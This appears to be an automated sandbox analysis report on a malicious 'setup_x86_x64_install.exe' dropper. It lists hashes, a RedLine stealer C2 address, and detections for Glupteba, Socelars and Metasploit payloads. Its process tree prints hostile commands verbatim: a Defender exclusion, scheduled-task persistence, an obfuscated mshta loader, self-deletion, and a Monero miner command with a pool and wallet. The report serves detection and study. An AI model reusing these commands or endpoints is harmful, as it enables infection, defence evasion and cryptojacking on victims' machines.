Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Analysis
-
max time kernel
16s -
max time network
1828s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
16-09-2021 21:08
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210916
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210916
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
6.5MB
-
MD5
064f0d6900675bed580da1291a566cfa
-
SHA1
f81699a68c901d190842de735dbda28a3fb52292
-
SHA256
7ec88d4baa0a97362a026cf6e0f46422379a99be6d9bfe19034152f3d47cc0ed
-
SHA512
41dc5c444afd6b5dc0947cf9950acb5aa1081ee9921c748195325b5cfcb23532cea1802959baa59a0c41ed998ba20b509ec107da882d5d8b3bf0b1d17f892738
Malware Config
Extracted
redline
ANI
45.142.215.47:27643
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba Payload 2 IoCs
resource yara_rule behavioral2/memory/2536-244-0x0000000002E60000-0x000000000377E000-memory.dmp family_glupteba behavioral2/memory/2536-245-0x0000000000400000-0x0000000000D39000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 960 2880 rundll32.exe 71 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3768 2880 rundll32.exe 71 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2764 2880 rundll32.exe 71 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral2/memory/2268-220-0x000000000041C5CA-mapping.dmp family_redline behavioral2/memory/2268-219-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral2/memory/2268-225-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
Socelars Payload 3 IoCs
resource yara_rule behavioral2/files/0x00030000000130d1-148.dat family_socelars behavioral2/files/0x00030000000130d1-168.dat family_socelars behavioral2/files/0x00030000000130d1-124.dat family_socelars -
resource yara_rule behavioral2/files/0x00030000000130ca-76.dat aspack_v212_v242 behavioral2/files/0x00030000000130ca-77.dat aspack_v212_v242 behavioral2/files/0x00040000000130c5-78.dat aspack_v212_v242 behavioral2/files/0x00040000000130c5-79.dat aspack_v212_v242 behavioral2/files/0x00030000000130cc-82.dat aspack_v212_v242 behavioral2/files/0x00030000000130cc-83.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 12 IoCs
pid Process 1592 setup_installer.exe 1184 setup_install.exe 1640 Thu20c467678e2c.exe 592 Thu20dae7c52bc0856.exe 1788 Thu20a5f7ccaa78.exe 1888 Thu20f2cf5e0c.exe 1220 Thu2026c04e7218e1.exe 1084 Thu203b503b429e68.exe 1960 Thu2094524d5e5b.exe 1692 Thu2025d6674aed72ba.exe 520 Thu2090b5515d63b2.exe 936 Thu2026c04e7218e1.tmp -
resource yara_rule behavioral2/files/0x00030000000130d8-100.dat vmprotect behavioral2/files/0x00030000000130d8-114.dat vmprotect behavioral2/memory/592-178-0x0000000140000000-0x0000000140650000-memory.dmp vmprotect behavioral2/files/0x00030000000130d8-133.dat vmprotect -
Loads dropped DLL 40 IoCs
pid Process 1104 setup_x86_x64_install.exe 1592 setup_installer.exe 1592 setup_installer.exe 1592 setup_installer.exe 1592 setup_installer.exe 1592 setup_installer.exe 1592 setup_installer.exe 1184 setup_install.exe 1184 setup_install.exe 1184 setup_install.exe 1184 setup_install.exe 1184 setup_install.exe 1184 setup_install.exe 1184 setup_install.exe 1184 setup_install.exe 1876 cmd.exe 1460 cmd.exe 1272 cmd.exe 1272 cmd.exe 1704 cmd.exe 1640 Thu20c467678e2c.exe 1640 Thu20c467678e2c.exe 1364 cmd.exe 1788 Thu20a5f7ccaa78.exe 1788 Thu20a5f7ccaa78.exe 268 cmd.exe 1100 cmd.exe 1100 cmd.exe 556 cmd.exe 1220 Thu2026c04e7218e1.exe 1220 Thu2026c04e7218e1.exe 1960 Thu2094524d5e5b.exe 1960 Thu2094524d5e5b.exe 1792 cmd.exe 1220 Thu2026c04e7218e1.exe 936 Thu2026c04e7218e1.tmp 936 Thu2026c04e7218e1.tmp 936 Thu2026c04e7218e1.tmp 1084 Thu203b503b429e68.exe 1084 Thu203b503b429e68.exe -
resource yara_rule behavioral2/memory/2980-253-0x00000000002A0000-0x00000000002A1000-memory.dmp themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 215 ipinfo.io 12 ip-api.com 35 ipinfo.io 36 ipinfo.io 117 ipinfo.io 171 ipinfo.io 214 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 2852 1084 WerFault.exe 39 3364 2616 WerFault.exe 68 3488 1716 WerFault.exe 116 -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3592 schtasks.exe 2556 schtasks.exe 3540 schtasks.exe 3560 schtasks.exe 1456 schtasks.exe 3528 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2060 timeout.exe 4092 timeout.exe -
Kills process with taskkill 3 IoCs
pid Process 2632 taskkill.exe 1780 taskkill.exe 668 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeCreateTokenPrivilege 1084 Thu203b503b429e68.exe Token: SeAssignPrimaryTokenPrivilege 1084 Thu203b503b429e68.exe Token: SeLockMemoryPrivilege 1084 Thu203b503b429e68.exe Token: SeIncreaseQuotaPrivilege 1084 Thu203b503b429e68.exe Token: SeMachineAccountPrivilege 1084 Thu203b503b429e68.exe Token: SeTcbPrivilege 1084 Thu203b503b429e68.exe Token: SeSecurityPrivilege 1084 Thu203b503b429e68.exe Token: SeTakeOwnershipPrivilege 1084 Thu203b503b429e68.exe Token: SeLoadDriverPrivilege 1084 Thu203b503b429e68.exe Token: SeSystemProfilePrivilege 1084 Thu203b503b429e68.exe Token: SeSystemtimePrivilege 1084 Thu203b503b429e68.exe Token: SeProfSingleProcessPrivilege 1084 Thu203b503b429e68.exe Token: SeIncBasePriorityPrivilege 1084 Thu203b503b429e68.exe Token: SeCreatePagefilePrivilege 1084 Thu203b503b429e68.exe Token: SeCreatePermanentPrivilege 1084 Thu203b503b429e68.exe Token: SeBackupPrivilege 1084 Thu203b503b429e68.exe Token: SeRestorePrivilege 1084 Thu203b503b429e68.exe Token: SeShutdownPrivilege 1084 Thu203b503b429e68.exe Token: SeDebugPrivilege 1084 Thu203b503b429e68.exe Token: SeAuditPrivilege 1084 Thu203b503b429e68.exe Token: SeSystemEnvironmentPrivilege 1084 Thu203b503b429e68.exe Token: SeChangeNotifyPrivilege 1084 Thu203b503b429e68.exe Token: SeRemoteShutdownPrivilege 1084 Thu203b503b429e68.exe Token: SeUndockPrivilege 1084 Thu203b503b429e68.exe Token: SeSyncAgentPrivilege 1084 Thu203b503b429e68.exe Token: SeEnableDelegationPrivilege 1084 Thu203b503b429e68.exe Token: SeManageVolumePrivilege 1084 Thu203b503b429e68.exe Token: SeImpersonatePrivilege 1084 Thu203b503b429e68.exe Token: SeCreateGlobalPrivilege 1084 Thu203b503b429e68.exe Token: 31 1084 Thu203b503b429e68.exe Token: 32 1084 Thu203b503b429e68.exe Token: 33 1084 Thu203b503b429e68.exe Token: 34 1084 Thu203b503b429e68.exe Token: 35 1084 Thu203b503b429e68.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1104 wrote to memory of 1592 1104 setup_x86_x64_install.exe 25 PID 1104 wrote to memory of 1592 1104 setup_x86_x64_install.exe 25 PID 1104 wrote to memory of 1592 1104 setup_x86_x64_install.exe 25 PID 1104 wrote to memory of 1592 1104 setup_x86_x64_install.exe 25 PID 1104 wrote to memory of 1592 1104 setup_x86_x64_install.exe 25 PID 1104 wrote to memory of 1592 1104 setup_x86_x64_install.exe 25 PID 1104 wrote to memory of 1592 1104 setup_x86_x64_install.exe 25 PID 1592 wrote to memory of 1184 1592 setup_installer.exe 26 PID 1592 wrote to memory of 1184 1592 setup_installer.exe 26 PID 1592 wrote to memory of 1184 1592 setup_installer.exe 26 PID 1592 wrote to memory of 1184 1592 setup_installer.exe 26 PID 1592 wrote to memory of 1184 1592 setup_installer.exe 26 PID 1592 wrote to memory of 1184 1592 setup_installer.exe 26 PID 1592 wrote to memory of 1184 1592 setup_installer.exe 26 PID 1184 wrote to memory of 1712 1184 setup_install.exe 28 PID 1184 wrote to memory of 1712 1184 setup_install.exe 28 PID 1184 wrote to memory of 1712 1184 setup_install.exe 28 PID 1184 wrote to memory of 1712 1184 setup_install.exe 28 PID 1184 wrote to memory of 1712 1184 setup_install.exe 28 PID 1184 wrote to memory of 1712 1184 setup_install.exe 28 PID 1184 wrote to memory of 1712 1184 setup_install.exe 28 PID 1184 wrote to memory of 1876 1184 setup_install.exe 29 PID 1184 wrote to memory of 1876 1184 setup_install.exe 29 PID 1184 wrote to memory of 1876 1184 setup_install.exe 29 PID 1184 wrote to memory of 1876 1184 setup_install.exe 29 PID 1184 wrote to memory of 1876 1184 setup_install.exe 29 PID 1184 wrote to memory of 1876 1184 setup_install.exe 29 PID 1184 wrote to memory of 1876 1184 setup_install.exe 29 PID 1184 wrote to memory of 1704 1184 setup_install.exe 30 PID 1184 wrote to memory of 1704 1184 setup_install.exe 30 PID 1184 wrote to memory of 1704 1184 setup_install.exe 30 PID 1184 wrote to memory of 1704 1184 setup_install.exe 30 PID 1184 wrote to memory of 1704 1184 setup_install.exe 30 PID 1184 wrote to memory of 1704 1184 setup_install.exe 30 PID 1184 wrote to memory of 1704 1184 setup_install.exe 30 PID 1184 wrote to memory of 1460 1184 setup_install.exe 31 PID 1184 wrote to memory of 1460 1184 setup_install.exe 31 PID 1184 wrote to memory of 1460 1184 setup_install.exe 31 PID 1184 wrote to memory of 1460 1184 setup_install.exe 31 PID 1184 wrote to memory of 1460 1184 setup_install.exe 31 PID 1184 wrote to memory of 1460 1184 setup_install.exe 31 PID 1184 wrote to memory of 1460 1184 setup_install.exe 31 PID 1184 wrote to memory of 1272 1184 setup_install.exe 32 PID 1184 wrote to memory of 1272 1184 setup_install.exe 32 PID 1184 wrote to memory of 1272 1184 setup_install.exe 32 PID 1184 wrote to memory of 1272 1184 setup_install.exe 32 PID 1184 wrote to memory of 1272 1184 setup_install.exe 32 PID 1184 wrote to memory of 1272 1184 setup_install.exe 32 PID 1184 wrote to memory of 1272 1184 setup_install.exe 32 PID 1712 wrote to memory of 1372 1712 cmd.exe 52 PID 1712 wrote to memory of 1372 1712 cmd.exe 52 PID 1712 wrote to memory of 1372 1712 cmd.exe 52 PID 1712 wrote to memory of 1372 1712 cmd.exe 52 PID 1712 wrote to memory of 1372 1712 cmd.exe 52 PID 1712 wrote to memory of 1372 1712 cmd.exe 52 PID 1712 wrote to memory of 1372 1712 cmd.exe 52 PID 1876 wrote to memory of 1640 1876 cmd.exe 51 PID 1876 wrote to memory of 1640 1876 cmd.exe 51 PID 1876 wrote to memory of 1640 1876 cmd.exe 51 PID 1876 wrote to memory of 1640 1876 cmd.exe 51 PID 1876 wrote to memory of 1640 1876 cmd.exe 51 PID 1876 wrote to memory of 1640 1876 cmd.exe 51 PID 1876 wrote to memory of 1640 1876 cmd.exe 51 PID 1184 wrote to memory of 1364 1184 setup_install.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Users\Admin\AppData\Local\Temp\7zS8369B2C1\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8369B2C1\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20c467678e2c.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Users\Admin\AppData\Local\Temp\7zS8369B2C1\Thu20c467678e2c.exeThu20c467678e2c.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1640 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"6⤵PID:1608
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit7⤵PID:2172
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'8⤵
- Creates scheduled task(s)
PID:1456
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"7⤵PID:2240
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:1556
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:2556
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵PID:2156
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth8⤵PID:1756
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"6⤵PID:1932
-
C:\ProgramData\7685490.exe"C:\ProgramData\7685490.exe"7⤵PID:2616
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2616 -s 15808⤵
- Program crash
PID:3364
-
-
-
C:\ProgramData\3895603.exe"C:\ProgramData\3895603.exe"7⤵PID:2980
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"6⤵PID:2052
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵PID:2536
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:2716
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"6⤵PID:2092
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit7⤵PID:2556
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f8⤵
- Kills process with taskkill
PID:2632
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"6⤵PID:2296
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20f2cf5e0c.exe4⤵
- Loads dropped DLL
PID:1704 -
C:\Users\Admin\AppData\Local\Temp\7zS8369B2C1\Thu20f2cf5e0c.exeThu20f2cf5e0c.exe5⤵
- Executes dropped EXE
PID:1888
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20dae7c52bc0856.exe4⤵
- Loads dropped DLL
PID:1460 -
C:\Users\Admin\AppData\Local\Temp\7zS8369B2C1\Thu20dae7c52bc0856.exeThu20dae7c52bc0856.exe5⤵
- Executes dropped EXE
PID:592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20a5f7ccaa78.exe4⤵
- Loads dropped DLL
PID:1272 -
C:\Users\Admin\AppData\Local\Temp\7zS8369B2C1\Thu20a5f7ccaa78.exeThu20a5f7ccaa78.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1788 -
C:\Users\Admin\AppData\Local\Temp\7zS8369B2C1\Thu20a5f7ccaa78.exeC:\Users\Admin\AppData\Local\Temp\7zS8369B2C1\Thu20a5f7ccaa78.exe6⤵PID:2204
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8369B2C1\Thu20a5f7ccaa78.exeC:\Users\Admin\AppData\Local\Temp\7zS8369B2C1\Thu20a5f7ccaa78.exe6⤵PID:2268
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2026c04e7218e1.exe4⤵
- Loads dropped DLL
PID:1364 -
C:\Users\Admin\AppData\Local\Temp\7zS8369B2C1\Thu2026c04e7218e1.exeThu2026c04e7218e1.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1220
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu203b503b429e68.exe4⤵
- Loads dropped DLL
PID:268 -
C:\Users\Admin\AppData\Local\Temp\7zS8369B2C1\Thu203b503b429e68.exeThu203b503b429e68.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1084 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1084 -s 15126⤵
- Program crash
PID:2852
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2094524d5e5b.exe4⤵
- Loads dropped DLL
PID:556 -
C:\Users\Admin\AppData\Local\Temp\7zS8369B2C1\Thu2094524d5e5b.exeThu2094524d5e5b.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1960 -
C:\Users\Admin\Documents\0LTLvSso9lARXr_FkY29OFrL.exe"C:\Users\Admin\Documents\0LTLvSso9lARXr_FkY29OFrL.exe"6⤵PID:2964
-
-
C:\Users\Admin\Documents\JsWWpcsVpVlHvVtkdTTE53qV.exe"C:\Users\Admin\Documents\JsWWpcsVpVlHvVtkdTTE53qV.exe"6⤵PID:2128
-
C:\Users\Admin\Documents\JsWWpcsVpVlHvVtkdTTE53qV.exe"C:\Users\Admin\Documents\JsWWpcsVpVlHvVtkdTTE53qV.exe"7⤵PID:3136
-
-
-
C:\Users\Admin\Documents\ip2lQ3tq0DrVECtFREb2Xrm9.exe"C:\Users\Admin\Documents\ip2lQ3tq0DrVECtFREb2Xrm9.exe"6⤵PID:2404
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:3528
-
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵PID:3516
-
C:\Users\Admin\Documents\VP3BdCtBcT7WfjwW9mcPgnIL.exe"C:\Users\Admin\Documents\VP3BdCtBcT7WfjwW9mcPgnIL.exe"8⤵PID:2720
-
-
C:\Users\Admin\Documents\7fqOyuIdsBLMwwEPIClnejyu.exe"C:\Users\Admin\Documents\7fqOyuIdsBLMwwEPIClnejyu.exe"8⤵PID:3084
-
-
C:\Users\Admin\Documents\Mw_Z3xvrMgsVXHDYUYbiYvmD.exe"C:\Users\Admin\Documents\Mw_Z3xvrMgsVXHDYUYbiYvmD.exe"8⤵PID:2628
-
C:\Users\Admin\AppData\Local\Temp\is-JBLU5.tmp\Mw_Z3xvrMgsVXHDYUYbiYvmD.tmp"C:\Users\Admin\AppData\Local\Temp\is-JBLU5.tmp\Mw_Z3xvrMgsVXHDYUYbiYvmD.tmp" /SL5="$10292,506127,422400,C:\Users\Admin\Documents\Mw_Z3xvrMgsVXHDYUYbiYvmD.exe"9⤵PID:2344
-
C:\Users\Admin\AppData\Local\Temp\is-AAKDN.tmp\Chmenka.exe"C:\Users\Admin\AppData\Local\Temp\is-AAKDN.tmp\Chmenka.exe" /S /UID=12410⤵PID:3880
-
C:\Users\Admin\AppData\Local\Temp\75-4cf19-546-8b28d-c3cee311ab0c8\Qihavugefa.exe"C:\Users\Admin\AppData\Local\Temp\75-4cf19-546-8b28d-c3cee311ab0c8\Qihavugefa.exe"11⤵PID:2080
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵PID:188
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:188 CREDAT:275457 /prefetch:213⤵PID:3544
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵PID:2544
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2544 CREDAT:275457 /prefetch:213⤵PID:2392
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=185148312⤵PID:824
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:824 CREDAT:275457 /prefetch:213⤵PID:2952
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=185151312⤵PID:2368
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2368 CREDAT:275457 /prefetch:213⤵PID:3384
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=208721512⤵PID:4092
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4092 CREDAT:275457 /prefetch:213⤵PID:2412
-
-
-
-
C:\Program Files\Mozilla Firefox\GFXFVTFROZ\IDownload.exe"C:\Program Files\Mozilla Firefox\GFXFVTFROZ\IDownload.exe" /VERYSILENT11⤵PID:380
-
-
C:\Users\Admin\AppData\Local\Temp\26-6a0b3-78e-825a5-7b8077cae76da\Wigomizhuji.exe"C:\Users\Admin\AppData\Local\Temp\26-6a0b3-78e-825a5-7b8077cae76da\Wigomizhuji.exe"11⤵PID:3772
-
-
-
-
-
C:\Users\Admin\Documents\3E2wT0obx1pBOoIgn0EXiEUp.exe"C:\Users\Admin\Documents\3E2wT0obx1pBOoIgn0EXiEUp.exe"8⤵PID:3128
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRiPT:closE (creatEOBJeCT( "WscriPT.shEll"). RUN("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\Documents\3E2wT0obx1pBOoIgn0EXiEUp.exe"" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF """" =="""" for %q In (""C:\Users\Admin\Documents\3E2wT0obx1pBOoIgn0EXiEUp.exe"" ) do taskkill -iM ""%~nxq"" /f " ,0 , TrUe ) )9⤵PID:3612
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\Documents\3E2wT0obx1pBOoIgn0EXiEUp.exe" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "" =="" for %q In ("C:\Users\Admin\Documents\3E2wT0obx1pBOoIgn0EXiEUp.exe" ) do taskkill -iM "%~nxq" /f10⤵PID:3592
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "3E2wT0obx1pBOoIgn0EXiEUp.exe" /f11⤵
- Kills process with taskkill
PID:1780
-
-
C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXeroBCqJOQYC.eXe -P0_6X2fnCLFU6G11⤵PID:3192
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRiPT:closE (creatEOBJeCT( "WscriPT.shEll"). RUN("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF ""-P0_6X2fnCLFU6G"" =="""" for %q In (""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" ) do taskkill -iM ""%~nxq"" /f " ,0 , TrUe ) )12⤵PID:2916
-
-
-
-
-
-
C:\Users\Admin\Documents\jb7C6TQKwYx1posBRg3pfpHy.exe"C:\Users\Admin\Documents\jb7C6TQKwYx1posBRg3pfpHy.exe"8⤵PID:2104
-
-
C:\Users\Admin\Documents\EL0iDT7XML2fWMW3oD6hE4Nv.exe"C:\Users\Admin\Documents\EL0iDT7XML2fWMW3oD6hE4Nv.exe"8⤵PID:3436
-
C:\Users\Admin\Documents\EL0iDT7XML2fWMW3oD6hE4Nv.exe"C:\Users\Admin\Documents\EL0iDT7XML2fWMW3oD6hE4Nv.exe"9⤵PID:764
-
-
-
C:\Users\Admin\Documents\fk8XIGAr6_ai1wlzEbB6EfyC.exe"C:\Users\Admin\Documents\fk8XIGAr6_ai1wlzEbB6EfyC.exe"8⤵PID:3408
-
C:\Users\Admin\AppData\Local\Temp\7zS6CF5.tmp\Install.exe.\Install.exe9⤵PID:3256
-
-
-
C:\Users\Admin\Documents\uqijkW0hIdIFq66T8bpnh9pK.exe"C:\Users\Admin\Documents\uqijkW0hIdIFq66T8bpnh9pK.exe" /mixtwo8⤵PID:3388
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "uqijkW0hIdIFq66T8bpnh9pK.exe" /f & erase "C:\Users\Admin\Documents\uqijkW0hIdIFq66T8bpnh9pK.exe" & exit9⤵PID:1680
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:3592
-
-
-
C:\Users\Admin\Documents\iL2r5cMG3G9yNaCQKfIlQkao.exe"C:\Users\Admin\Documents\iL2r5cMG3G9yNaCQKfIlQkao.exe"6⤵PID:2132
-
-
C:\Users\Admin\Documents\MBpliYl2KAut7qFGTqFGlmF4.exe"C:\Users\Admin\Documents\MBpliYl2KAut7qFGTqFGlmF4.exe"6⤵PID:2444
-
-
